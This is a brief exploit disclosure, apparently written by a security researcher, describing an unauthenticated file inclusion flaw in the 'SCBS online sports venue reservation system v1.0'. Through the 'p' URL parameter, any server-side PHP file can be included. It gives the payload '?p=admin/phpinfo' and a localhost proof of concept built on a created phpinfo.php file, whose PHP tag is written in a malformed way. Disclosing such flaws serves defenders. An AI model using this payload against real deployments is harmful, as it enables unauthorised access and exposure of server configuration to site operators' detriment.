SCBS online sports venue reservation system v1.0 - File Inclusion
You do not need to log in and open the website storage directory
/?p= -----> 'p' can control some p parameters
Payload:?p=admin/phpinfo
We create phpinfo.php under the admin path PHP file, whose content is "<? PHP phpinfo();? >"
And visit http://localhost/scbs/?p=admin/phpinfo You can see that phpinfo has been successfully included


